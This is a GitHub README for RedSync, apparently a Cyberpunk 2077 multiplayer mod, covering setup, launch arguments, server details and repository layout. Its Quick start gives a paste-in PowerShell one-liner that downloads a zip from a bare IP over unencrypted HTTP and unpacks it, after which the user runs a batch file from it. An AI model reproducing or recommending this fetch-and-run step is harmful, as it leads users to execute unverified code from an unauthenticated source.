Skip to content

Latest commit

History

History
62 lines (42 loc) 路 2.03 KB

File metadata and controls

62 lines (42 loc) 路 2.03 KB

RedSync

Multiplayer mod for Cyberpunk 2077 (v2.31): RED4ext client plugin, redscript HUD, and a .NET + native UDP server (GameNetworkingSockets).

Quick start

Download launcher (goes to your Downloads folder):

http://88.214.59.166:5005/api/media/RedSync_Launcher.zip

Or in PowerShell (auto-extracts to Downloads\RedSync_Launcher):

irm http://88.214.59.166:5005/api/media/RedSync_Launcher.zip -OutFile "$env:USERPROFILE\Downloads\RedSync_Launcher.zip"; Expand-Archive "$env:USERPROFILE\Downloads\RedSync_Launcher.zip" -DestinationPath "$env:USERPROFILE\Downloads" -Force; explorer "$env:USERPROFILE\Downloads\RedSync_Launcher"

Then:

  1. Open Downloads\RedSync_Launcher and run PLAY.bat.
  2. When prompted, pick your username (Enter keeps the last one). Admins must match XEROX710 / lucifer420.
  3. (First time only) install the client with release\Install-All.bat from the full package if RedSync is not in the game yet.

Default public server:

88.214.59.166:1337

Launch args (username is required for nametags / F7 admin):

--redsync-server-address=88.214.59.166 --redsync-server-port=1337 --redsync-username=YOUR_NAME --launcher-skip

Launcher (replaces XBUNIVERSE)

See release/RedSync_Launcher/. Run Convert-From-XBUNIVERSE.ps1 to rename your Downloads launcher folder, install the username picker, and point Play at the VPS. Or use release/Download-Launcher-To-Downloads.ps1 / GET-REDSYNC-LAUNCHER.ps1.

Server (VPS)

Deploy helpers live in deploy/. The production host is 88.214.59.166 (UDP 1337).

Requirements

Dependency Role
Cyberpunk 2077 2.31 Game
RED4ext 1.30+ Plugin loader
redscript 0.5.31+ Scripts
Codeware 1.18+ Entity spawn
CET + AMM Remote appearance

Layout

Path Role
client/ RED4ext + redscript client
server/ Native + managed game server
shared/protocol Shared packets
release/ Tester package / launchers